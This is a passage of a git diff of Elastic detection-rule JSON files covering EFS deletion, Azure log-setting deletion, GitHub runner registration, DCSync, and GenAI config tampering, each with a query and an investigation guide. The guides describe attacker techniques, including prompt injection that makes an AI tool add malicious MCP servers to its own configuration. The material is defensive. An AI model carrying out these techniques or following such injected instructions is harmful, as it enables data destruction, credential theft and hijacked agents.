EFS file system using the \"DeleteFileSystem\" API operation. Deleting an EFS file system permanently removes all stored data and cannot be reversed. This action is rare in most environments and typically limited to controlled teardown workflows. Adversaries with sufficient permissions may delete a file system to destroy evidence, disrupt workloads, or impede recovery efforts.", + "false_positives": [ + "Legitimate teardown or environment decommissioning processes may delete EFS file systems. Verify whether the calling user, role, automation system, or CI/CD workflow is expected to perform destructive actions in the affected account. File system deletions by unfamiliar identities, from unusual IP addresses, or occurring outside approved change windows should be carefully reviewed. If known automation routinely deletes ephemeral test file systems, consider adding scoped exceptions." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS EFS File System Deleted", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS EFS File System Deleted\n\nAmazon Elastic File System (EFS) provides scalable, shared file storage used by EC2, container workloads, analytics jobs, and other persistent applications. Deleting an EFS file system (`DeleteFileSystem`) permanently removes all stored data and cannot be recovered. Mount targets must already be deleted, but those operations are common and do not themselves indicate malicious behavior. This rule focuses exclusively on the irreversible destructive event, which may signal intentional data destruction, ransomware preparation, or a post-compromise cleanup effort.\n\n#### Possible investigation steps\n\n- **Identify the actor and calling context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`.\n - Check `source.ip`, `user_agent.original`, and whether the call originated via console, IAM role, STS session, or long-lived IAM key.\n - Verify whether this principal typically manages EFS resources or teardown activities.\n\n- **Determine what was deleted**\n - Inspect `aws.cloudtrail.request_parameters` to identify the deleted file system ID.\n - Map the resource to:\n - Application or owner team\n - Environment classification (prod / dev / test)\n - Dependency surfaces (EC2 instances, ECS tasks, Lambda, analytics pipelines)\n\n- **Reconstruct timeline and intent**\n - Use `@timestamp` to correlate with:\n - Recent `UpdateFileSystem` events (e.g., deletion protection, lifecycle policies)\n - IAM policy or trust policy changes\n - EC2 or container runtime disruption shortly before deletion\n - Unexpected regional activity or off-hours execution\n - Determine if mount target deletions occurred immediately beforehand (expected lifecycle) or unexpectedly earlier (possibly suspicious when paired with other anomalies).\n\n- **Correlate with broader account activity**\n - Pivot in CloudTrail on:\n - The same access key or session\n - The same EFS file system ID\n - Look for:\n - Privilege escalation (new policy attachments, role assumptions)\n - Lateral movement (SSM sessions, unusual EC2 access)\n - Signs of cleanup or anti-forensics (CloudWatch log group deletions, RDS snapshot deletions)\n - Network isolation actions (security-group or NACL updates)\n\n- **Validate with owners**\n - Confirm with application or infrastructure teams:\n - Whether the deletion was planned, approved, or part of an environment teardown\n - Whether a migration or infrastructure rotation is in progress\n - Whether the deleted file system contained production or sensitive workloads\n\n### False positive analysis\n\n- **Expected teardown activity**\n - Some pipelines (Terraform, CloudFormation, CDK, custom IaC) delete file systems as part of environment rotation or decommissioning.\n - Add exceptions for known automation roles or environment tags (e.g., `Environment=Dev`).\n\n- **Ephemeral test environments**\n - Development, QA, or integration test accounts may routinely create and destroy EFS file systems.\n - Suppress events for non-production accounts where destructive operations are normal.\n\n- **Automated housekeeping**\n - Internal tooling or lifecycle processes may remove unused EFS resources.\n - Identify automation roles and use exceptions based on `aws.cloudtrail.user_identity.arn` or `user_agent.original`.\n\n### Response and remediation\n\n- **Contain and secure**\n - If unauthorized, revoke or disable the credentials used for the deletion.\n - Review CloudTrail for additional destructive or privilege-escalating operations from the same actor.\n - Validate whether any associated compute workloads (EC2, ECS, Lambda) show compromise indicators.\n\n- **Assess impact**\n - Identify workloads impacted by the file system deletion.\n - Determine whether alternate backups exist (EFS-to-EFS Backup, AWS Backup vaults).\n - Evaluate operational disruption and data-loss implications, especially for compliance-bound data.\n\n- **Recover (if possible)**\n - Restore from AWS Backup if a protected resource existed.\n - Rebuild infrastructure dependencies that relied on the deleted file system.\n\n- **Hardening and prevention**\n - Restrict use of `elasticfilesystem:DeleteFileSystem` to tightly controlled IAM roles.\n - Use IAM conditions (e.g., `aws:PrincipalArn`, `aws:SourceIp`, `aws:RequestedRegion`) to limit destructive operations.\n - Ensure AWS Backup policies include EFS resources with sufficient retention.\n - Use AWS Config or Security Hub controls to detect:\n - EFS file systems without backup plans\n - Unexpected changes to file system policies\n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "event.dataset: \"aws.cloudtrail\" \n and event.provider: \"elasticfilesystem.amazonaws.com\" \n and event.action: \"DeleteFileSystem\" \n and event.outcome: \"success\"\n", + "references": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "536997f7-ae73-447d-a12d-bff1e8f5f0a0", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EFS", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "536997f7-ae73-447d-a12d-bff1e8f5f0a0_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104.json b/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104.json deleted file mode 100644 index 7bcaa3f2269..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses.", - "false_positives": [ - "Deletion of diagnostic settings may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Diagnostic settings deletion from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Diagnostic Settings Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Diagnostic Settings Deletion\n\nAzure Diagnostic Settings are crucial for monitoring and logging platform activities, sending data to various destinations for analysis. Adversaries may delete these settings to hinder detection and analysis of their activities, effectively evading defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs for successful deletion operations, flagging potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and ensuring the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Check the timestamp of the deletion event to determine when the diagnostic settings were removed and correlate this with other security events or alerts around the same time.\n- Investigate the affected resources by identifying which diagnostic settings were deleted and assess the potential impact on monitoring and logging capabilities.\n- Review any recent changes or activities performed by the identified user or service principal to determine if there are other suspicious actions that might indicate malicious intent.\n- Assess the current security posture by ensuring that diagnostic settings are reconfigured and that logging and monitoring are restored to maintain visibility into platform activities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the rule. Ensure that maintenance schedules are documented and align with the detected events.\n- Automated scripts or tools used for managing Azure resources might delete diagnostic settings as part of their operation. Review and whitelist these scripts if they are verified as non-threatening.\n- Changes in organizational policy or compliance requirements could lead to legitimate deletions. Confirm with relevant teams if such policy changes are in effect.\n- Test environments often undergo frequent configuration changes, including the deletion of diagnostic settings. Consider excluding these environments from the rule or adjusting the rule to account for their unique behavior.\n- Ensure that any third-party integrations or services with access to Azure resources are reviewed, as they might inadvertently delete diagnostic settings during their operations.\n\n### Response and remediation\n\n- Immediately isolate affected Azure resources to prevent further unauthorized changes or deletions. This may involve temporarily restricting access to the affected subscriptions or resource groups.\n- Review the Azure activity logs to identify the source of the deletion request, including the user account and IP address involved. This will help determine if the action was authorized or malicious.\n- Recreate the deleted diagnostic settings as soon as possible to restore logging and monitoring capabilities. Ensure that logs are being sent to secure and appropriate destinations.\n- Conduct a thorough investigation of the user account involved in the deletion. If the account is compromised, reset credentials, and review permissions to ensure they are appropriate and follow the principle of least privilege.\n- Escalate the incident to the security operations team for further analysis and to determine if additional resources or expertise are needed to address the threat.\n- Implement additional monitoring and alerting for similar deletion activities to ensure rapid detection and response to future attempts.\n- Review and update access controls and policies related to diagnostic settings to prevent unauthorized deletions, ensuring that only trusted and necessary personnel have the ability to modify these settings.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 104 - }, - "id": "5370d4cd-2bb3-4d71-abf5-1e1d0ff5a2de_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/57e118c1-19eb-4c20-93a6-8a6c30a5b48b_1.json b/packages/security_detection_engine/kibana/security_rule/57e118c1-19eb-4c20-93a6-8a6c30a5b48b_1.json new file mode 100644 index 00000000000..5d4b6c4706c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/57e118c1-19eb-4c20-93a6-8a6c30a5b48b_1.json @@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the configuration of a GitHub Actions self-hosted runner using the Runner.Listener binary. When a machine is registered to a remote repository, its owner gains the ability to execute arbitrary workflow commands on that host. Unexpected or unauthorized runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows.", + "false_positives": [ + "Authorized github repository with no malicious workflow actions." + ], + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote GitHub Actions Runner Registration", + "note": "## Triage and analysis\n\n### Investigating Remote GitHub Actions Runner Registration\n\nUnexpected or unauthorized Github actions runner registration may indicate adversarial activity aimed at establishing remote code execution via malicious GitHub workflows.\n\n### Possible investigation steps\n\n- Review the remote repository details and reputation.\n- Examine the remote repository for any suspicious workflows run commands in the `.github/workflows` folder.\n- Examine the execution context like process tree, associated network and file activities.\n- Verify if there is adjascent any sensitive file access or collection.\n- Correlate with other alerts and investiguate if this activity is related to a supply chain attack.\n\n### False positive analysis\n\n- Authorized configuration changes.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized command execution and potential lateral movement.\n- Terminate any suspicious child processes that were initiated by the registered Github actions runner.\n- Conduct a thorough review of the affected system's logs and configurations to identify any unauthorized changes or additional indicators of compromise.\n- Restore the system from a known good backup if any unauthorized changes or malicious activities are confirmed.\n- Implement application whitelisting to prevent unauthorized execution.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network.", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\n process.name in (\"Runner.Listener\", \"Runner.Listener.exe\") and\n process.args == \"configure\" and process.args == \"--url\" and process.args == \"--token\"\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "57e118c1-19eb-4c20-93a6-8a6c30a5b48b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "57e118c1-19eb-4c20-93a6-8a6c30a5b48b_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_1.json b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_1.json new file mode 100644 index 00000000000..120782a6632 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_1.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unusual Process Modifying GenAI Configuration File", + "new_terms_fields": [ + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Unusual Process Modifying GenAI Configuration File\n\nConfiguration files for GenAI tools like Cursor, Claude, Copilot, and Ollama control which MCP servers, plugins, and extensions are loaded. Attackers target these files to inject malicious MCP servers that execute arbitrary commands, exfiltrate data, or establish persistence. Threats include external processes (malware, compromised scripts, supply chain attacks) directly modifying configs, as well as prompt injection attacks that abuse the AI tool's own file access capabilities. \n\n### Possible investigation steps\n\n- Identify the process that modified the configuration file and determine if it's expected (GenAI tool, installer, user action) or suspicious (unknown script, malware).\n- If the modifying process is NOT a GenAI tool, investigate its origin, parent process tree, and whether it was downloaded or executed from a suspicious location.\n- If a GenAI tool made the modification, check recent user prompts or agent activity that may have triggered the config change via prompt injection.\n- Review the contents of the modified configuration file for suspicious MCP server URLs, unauthorized plugins, or unusual agent permissions.\n- Examine the process command line and parent process tree to identify how the modifying process was invoked.\n- Check for other file modifications by the same process around the same time, particularly to other GenAI configs or startup scripts.\n- Investigate whether the GenAI tool subsequently connected to unknown domains or spawned unusual child processes after the config change.\n\n### False positive analysis\n\n- Novel but legitimate configuration changes will trigger this rule when the process/file combination hasn't been seen in 7 days. Review the modified file content to determine legitimacy.\n- GenAI tool updates may modify config files in new ways; correlate with recent software updates.\n- IDE extensions integrating with GenAI tools may modify configs as part of initial setup.\n\n### Response and remediation\n\n- Review the modified configuration file and revert any unauthorized changes to MCP servers, plugins, or agent settings.\n- If malicious MCP servers were added, block the associated domains at the network level.\n- Review and rotate any API keys or credentials that may have been exposed through the compromised GenAI configuration.\n", + "query": "event.category : \"file\" and event.action : (\"modification\" or \"overwrite\") and\nfile.path : (\n */.cursor/mcp.json or */.cursor/settings.json or */AppData/Roaming/Cursor/*mcp* or\n */.claude/* or */claude_desktop_config.json or */AppData/Roaming/Claude/* or\n */.config/github-copilot/* or */AppData/Local/GitHub?Copilot/* or\n */.ollama/config* or */AppData/Local/Ollama/* or\n */.codex/* or */AppData/Roaming/Codex/* or\n */.gemini/* or */AppData/Roaming/gemini-cli/* or\n */.grok/* or */AppData/Roaming/Grok/* or\n */.windsurf/* or */AppData/Roaming/Windsurf/* or\n */.vscode/extensions/*mcp*\n)\n", + "references": [ + "https://modelcontextprotocol.io/", + "https://www.cybereason.com/blog/security-research/weaponized-ai-how-cybercriminals-exploit-mcp-for-account-takeover", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "590fc62d-7386-4c75-92b0-af4517018da1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Host Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "590fc62d-7386-4c75-92b0-af4517018da1_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_210.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_210.json index d5ee686290f..8b7f9725b94 100644 --- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_210.json +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208.json deleted file mode 100644 index a3c70b4d111..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the creation of an AWS log trail that specifies the settings for delivery of log data.", - "false_positives": [ - "Trail creations may be made by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Trail creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudTrail Log Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS CloudTrail Log Created\n\nAWS CloudTrail is a service that enables governance, compliance, and operational and risk auditing of your AWS account. It logs API calls and related events, providing visibility into user activity. Adversaries may create new trails to capture sensitive data or cover their tracks. The detection rule identifies successful trail creation, signaling potential unauthorized activity, aiding in early threat detection.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs to identify the user or role associated with the CreateTrail event by examining the user identity information in the event logs.\n- Check the time and date of the CreateTrail event to determine if it aligns with any known maintenance or administrative activities.\n- Investigate the configuration of the newly created trail to understand what specific log data it is set to capture and where it is being delivered.\n- Assess whether the trail creation was authorized by cross-referencing with change management records or by contacting relevant personnel.\n- Analyze other recent AWS CloudTrail events associated with the same user or role to identify any suspicious or unusual activities that may indicate malicious intent.\n- Evaluate the permissions and access policies of the user or role involved in the event to ensure they align with the principle of least privilege.\n\n### False positive analysis\n\n- Routine administrative actions by authorized personnel can trigger this rule. Regularly review and document legitimate trail creation activities to differentiate them from unauthorized actions.\n- Automated processes or scripts that create trails for compliance or monitoring purposes may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts.\n- Third-party security tools or services that integrate with AWS and create trails for enhanced logging might be mistaken for suspicious activity. Verify these integrations and exclude them from the rule if they are part of your security strategy.\n- Changes in organizational policy or structure that require new trail creation can lead to false positives. Ensure that such changes are communicated to the security team to adjust the rule settings accordingly.\n\n### Response and remediation\n\n- Immediately review the newly created CloudTrail log to verify its legitimacy. Check the user or service account that initiated the trail creation and confirm if it aligns with expected administrative activities.\n- If the trail creation is unauthorized, disable or delete the trail to prevent further data capture by potential adversaries.\n- Conduct a thorough audit of recent API calls and user activities associated with the account that created the trail to identify any other suspicious actions or configurations.\n- Escalate the incident to the security operations team for further investigation and to determine if additional AWS resources have been compromised.\n- Implement additional monitoring and alerting for any future unauthorized CloudTrail modifications or creations to enhance early detection capabilities.\n- Review and tighten IAM policies and permissions to ensure that only authorized personnel have the ability to create or modify CloudTrail configurations.\n- Consider enabling AWS CloudTrail log file integrity validation to ensure that log files have not been altered or deleted, providing an additional layer of security.", - "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:CreateTrail and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_CreateTrail.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/create-trail.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Use Case: Log Auditing", - "Tactic: Collection", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_115.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_115.json deleted file mode 100644 index 80e7b277196..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_115.json +++ /dev/null @@ -1,124 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", - "from": "now-9m", - "history_window_start": "now-15d", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "FirstTime Seen Account Performing DCSync", - "new_terms_fields": [ - "winlog.event_data.SubjectUserName" - ], - "note": "## Triage and analysis\n\n### Investigating FirstTime Seen Account Performing DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom 